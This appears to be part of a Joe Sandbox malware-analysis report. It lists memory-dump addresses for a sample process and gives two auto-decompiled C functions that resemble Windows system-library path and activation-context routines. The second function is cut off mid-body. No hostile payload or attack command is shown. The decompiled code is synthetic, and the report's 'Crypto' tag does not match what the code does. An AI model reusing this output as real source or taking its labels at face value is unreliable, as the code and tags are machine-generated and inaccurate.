                    0x01736203
                    0x01736209
                    0x0173620a
                    0x01736216
                    0x0173621d
                    0x01736227
                    0x01736241
                    0x01736246
                    0x0173624c
                    0x01736257
                    0x01736259
                    0x0173625c
                    0x0173625e
                    0x01736260
                    0x01736260
                    0x01736260
                    0x01736260
                    0x0173625e
                    0x01736264
                    0x01736267
                    0x01736269
                    0x01736315
                    0x01736315
                    0x0173631b
                    0x0173631e
                    0x01736324
                    0x01736327
                    0x0173632f
                    0x01736330
                    0x01736333
                    0x0173633a
                    0x0173633c
                    0x01736335
                    0x01736335
                    0x01736335
                    0x0173633f
                    0x01736342
                    0x0173634c
                    0x01736352
                    0x01736355
                    0x01736355
                    0x01736359
                    0x00000000
                    0x0173626f
                    0x01736275
                    0x01736275
                    0x01736278
                    0x0173627e
                    0x0173627e
                    0x01736281
                    0x01736287
                    0x0173628d
                    0x01736298
                    0x0173629c
                    0x017362a2
                    0x0173629e
                    0x0173629e
                    0x0173629e
                    0x017362a7
                    0x017362a7
                    0x017362aa
                    0x017362b0
                    0x017362f0
                    0x017362f0
                    0x017362f2
                    0x017362f8
                    0x017362fd
                    0x017362b2
                    0x017362b2
                    0x017362b2
                    0x017362b5
                    0x017362dd
                    0x017362e2
                    0x017362e5
                    0x017362b7
                    0x017362b8
                    0x017362bb
                    0x017362bd
                    0x017362c0
                    0x017362c4
                    0x017362cd
                    0x017362cd
                    0x017362c0
                    0x017362bb
                    0x017362b5
                    0x01736302
                    0x01736303
                    0x01736305
                    0x01736305
                    0x01736305
                    0x0173630c
                    0x0173630c
                    0x00000000
                    0x0173627e
                    0x01736269
                    0x01735eac
                    0x01735ebb
                    0x01735ebe
                    0x01735ecb
                    0x01735ecb
                    0x01735ece
                    0x01735ece
                    0x01735ed4
                    0x01735ed7
                    0x01735ed9
                    0x01735edb
                    0x01735edb
                    0x01735ee1
                    0x01735ee1
                    0x01735ee3
                    0x01735f20
                    0x01735f20
                    0x01735ee5
                    0x01735ee5
                    0x01735ee5
                    0x01735ee8
                    0x01735f11
                    0x01735f18
                    0x01735eea
                    0x01735eea
                    0x01735eed
                    0x01735ef2
                    0x01735ef8
                    0x01735efb
                    0x01735f0a
                    0x01735f0a
                    0x01735eed
                    0x01735ee8
                    0x01735f22
                    0x01735f28
                    0x00000000
                    0x00000000
                    0x01735f30
                    0x01735f31
                    0x01735f37
                    0x01735f3a
                    0x01735f3d
                    0x01735f44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01735f46
                    0x01735f48
                    0x01735f4d
                    0x00000000
                    0x01735f4d
                    0x01735dda
                    0x01735ddf
                    0x00000000
                    0x01735ddf
                    0x01735dd8
                    0x01735da7
                    0x01735da9
                    0x01735dac
                    0x01735dae
                    0x00000000
                    0x01735db4
                    0x01735db4
                    0x00000000
                    0x01735db4
                    0x01735dae
                    0x01735d88
                    0x01735d8d
                    0x01736363
                    0x01736369
                    0x0173636a
                    0x01736370
                    0x01736372
                    0x0173637a
                    0x0173637b
                    0x0173637d
                    0x00000000
                    0x00000000
                    0x0173637f
                    0x01736385
                    0x00000000
                    0x01736385
                    0x01735d38
                    0x01735d3b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01735d3b
                    0x01735d27
                    0x01735d29
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01736360
                    0x00000000
                    0x01736360
                    0x01735c10
                    0x01735c10
                    0x017363da
                    0x017363e5
                    0x017363e5

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b3528c8a4a72fb0e7493e6eab3149afe4eeee9635ef83a41b7243e75e3ee17e
                    • Instruction ID: f8832076016aeb228757a6ed48aa3d63774f5421a3bcf05c9836cd97cfa8e3e2
                    • Opcode Fuzzy Hash: 8b3528c8a4a72fb0e7493e6eab3149afe4eeee9635ef83a41b7243e75e3ee17e
                    • Instruction Fuzzy Hash: 69423C75910229DFDB24CF68C880BA9FBB1FF85304F1581EAE94DAB242D7749A85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01684120 Relevance: .4, Instructions: 444COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E01684120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x175d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0169F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01686E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01684620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01686E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M016845F8))) {
												case 0:
													_v568 = 0x1641078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x16411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01684620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E016AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E016AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E016652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0167EB70(1, 0x17579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0167AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016A95D0();
																			L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E016AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E016A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E016AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                    0x01684128
                    0x01684135
                    0x0168413c
                    0x01684141
                    0x01684145
                    0x01684147
                    0x0168414e
                    0x01684151
                    0x01684159
                    0x0168415c
                    0x01684160
                    0x01684164
                    0x01684168
                    0x0168416c
                    0x0168417f
                    0x01684181
                    0x0168446a
                    0x0168446a
                    0x0168418c
                    0x01684195
                    0x01684199
                    0x01684432
                    0x01684439
                    0x0168443d
                    0x01684442
                    0x01684447
                    0x00000000
                    0x0168419f
                    0x016841a3
                    0x016841b1
                    0x016841b9
                    0x016841bd
                    0x016845db
                    0x016845db
                    0x00000000
                    0x016841c3
                    0x016841c3
                    0x016841ce
                    0x016841d4
                    0x016ce138
                    0x016ce13e
                    0x016ce169
                    0x016ce16d
                    0x016ce19e
                    0x016ce16f
                    0x016ce16f
                    0x016ce175
                    0x016ce179
                    0x016ce18f
                    0x016ce193
                    0x00000000
                    0x016ce199
                    0x00000000
                    0x016ce199
                    0x016ce193
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016841da
                    0x016841da
                    0x016841df
                    0x016841e4
                    0x016841ec
                    0x01684203
                    0x01684207
                    0x016ce1fd
                    0x01684222
                    0x01684226
                    0x016ce1f3
                    0x016ce1f3
                    0x0168422c
                    0x0168422c
                    0x01684233
                    0x016ce1ed
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01684239
                    0x01684239
                    0x01684239
                    0x01684239
                    0x01684233
                    0x01684226
                    0x016841ee
                    0x016841ee
                    0x016841f4
                    0x01684575
                    0x016ce1b1
                    0x016ce1b1
                    0x00000000
                    0x0168457b
                    0x0168457b
                    0x01684582
                    0x016ce1ab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01684588
                    0x01684588
                    0x0168458c
                    0x016ce1c4
                    0x016ce1c4
                    0x00000000
                    0x01684592
                    0x01684592
                    0x01684599
                    0x016ce1be
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168459f
                    0x0168459f
                    0x016845a3
                    0x016ce1d7
                    0x016ce1e4
                    0x00000000
                    0x016845a9
                    0x016845a9
                    0x016845b0
                    0x016ce1d1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016845b6
                    0x016845b6
                    0x016845b6
                    0x00000000
                    0x016845b6
                    0x016845b0
                    0x016845a3
                    0x01684599
                    0x0168458c
                    0x01684582
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016841f4
                    0x0168423e
                    0x01684241
                    0x016845c0
                    0x016845c4
                    0x00000000
                    0x016845ca
                    0x016845ca
                    0x00000000
                    0x016ce207
                    0x016ce20f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016845d1
                    0x00000000
                    0x00000000
                    0x016845ca
                    0x00000000
                    0x01684247
                    0x01684247
                    0x01684247
                    0x01684249
                    0x01684249
                    0x01684249
                    0x01684251
                    0x01684251
                    0x01684257
                    0x0168425f
                    0x0168426e
                    0x01684270
                    0x0168427a
                    0x016ce219
                    0x016ce219
                    0x01684280
                    0x01684282
                    0x01684456
                    0x016845ea
                    0x00000000
                    0x016845f0
                    0x016ce223
                    0x00000000
                    0x016ce223
                    0x0168445c
                    0x0168445c
                    0x00000000
                    0x0168445c
                    0x00000000
                    0x01684288
                    0x0168428c
                    0x016ce298
                    0x01684292
                    0x01684292
                    0x0168429e
                    0x016842a3
                    0x016842a7
                    0x016842ac
                    0x016ce22d
                    0x016842b2
                    0x016842b2
                    0x016842b9
                    0x016842bc
                    0x016842c2
                    0x016842ca
                    0x016842cd
                    0x016842cd
                    0x016842d4
                    0x0168433f
                    0x0168433f
                    0x016842d6
                    0x016842d6
                    0x016842d9
                    0x016842dd
                    0x016842eb
                    0x016ce23a
                    0x016842f1
                    0x01684305
                    0x0168430d
                    0x01684315
                    0x01684318
                    0x0168431f
                    0x01684322
                    0x0168432e
                    0x0168433b
                    0x0168433b
                    0x00000000
                    0x0168432e
                    0x016842eb
                    0x0168434c
                    0x0168434e
                    0x01684352
                    0x01684359
                    0x0168435e
                    0x01684361
                    0x0168436e
                    0x0168438a
                    0x0168438e
                    0x01684396
                    0x0168439e
                    0x016843a1
                    0x016843ad
                    0x016843bb
                    0x016843bb
                    0x016843ad
                    0x0168436e
                    0x016843bf
                    0x016843c5
                    0x01684463
                    0x01684463
                    0x016843ce
                    0x016843d5
                    0x016843d9
                    0x016843df
                    0x01684475
                    0x01684479
                    0x01684491
                    0x01684491
                    0x01684479
                    0x016843e5
                    0x016843eb
                    0x016843f4
                    0x016843f6
                    0x016843f9
                    0x016843fc
                    0x016843ff
                    0x016844e8
                    0x016844ed
                    0x016844f3
                    0x016ce247
                    0x00000000
                    0x016844f9
                    0x01684504
                    0x01684508
                    0x0168450f
                    0x016ce269
                    0x00000000
                    0x01684515
                    0x01684519
                    0x01684531
                    0x01684534
                    0x01684537
                    0x0168453e
                    0x01684541
                    0x0168454a
                    0x016ce255
                    0x016ce255
                    0x016ce25b
                    0x016ce25e
                    0x016ce261
                    0x016ce261
                    0x01684555
                    0x01684559
                    0x0168455d
                    0x016ce26d
                    0x016ce270
                    0x016ce274
                    0x016ce27a
                    0x016ce27d
                    0x016ce28e
                    0x016ce28e
                    0x01684563
                    0x01684563
                    0x01684569
                    0x01684569
                    0x00000000
                    0x0168455d
                    0x0168450f
                    0x00000000
                    0x016844f3
                    0x016843ff
                    0x01684405
                    0x01684405
                    0x01684405
                    0x016842ac
                    0x0168428c
                    0x01684282
                    0x01684407
                    0x0168440d
                    0x016ce2af
                    0x016ce2af
                    0x01684413
                    0x01684413
                    0x00000000
                    0x016841d4
                    0x00000000
                    0x016841c3
                    0x016841bd
                    0x01684415
                    0x01684415
                    0x01684416
                    0x01684417
                    0x01684429
                    0x0168416e
                    0x0168416e
                    0x01684175
                    0x01684498
                    0x0168449f
                    0x016ce12d
                    0x00000000
                    0x016ce133
                    0x00000000
                    0x016ce133
                    0x016844a5
                    0x016844a5
                    0x016844aa
                    0x00000000
                    0x016844bb
                    0x016844ca
                    0x016844d6
                    0x016844d7
                    0x016844d8
                    0x016844e3
                    0x016844e3
                    0x016844aa
                    0x0168417b
                    0x0168417b
                    0x0168417b
                    0x00000000
                    0x0168417b
                    0x01684175
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 374dff7f4a5ba3e7b37b7d0e348a95daa5228bfd5532cbb221b92d380c941ba9
                    • Instruction ID: 76c60947c1ce9de87f5c10fa810775b9b1acbf65785912218af18df1e6ef298d
                    • Opcode Fuzzy Hash: 374dff7f4a5ba3e7b37b7d0e348a95daa5228bfd5532cbb221b92d380c941ba9
                    • Instruction Fuzzy Hash: ABF16D706082128BD724DF59C890B7ABBF2EF98714F148A2EF586C7750EB35D891CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016920A0 Relevance: .4, Instructions: 420COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E016920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1758714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01692EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01692EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E016658EC(_t240);
									_t221 =  *0x1755cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1755cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E016A4A2C(0x1756e40, 0x16a4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01687D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1645c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0169F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0169F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E016E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01682400(_t267 + 0x20);
															}
															L01682400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01692397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
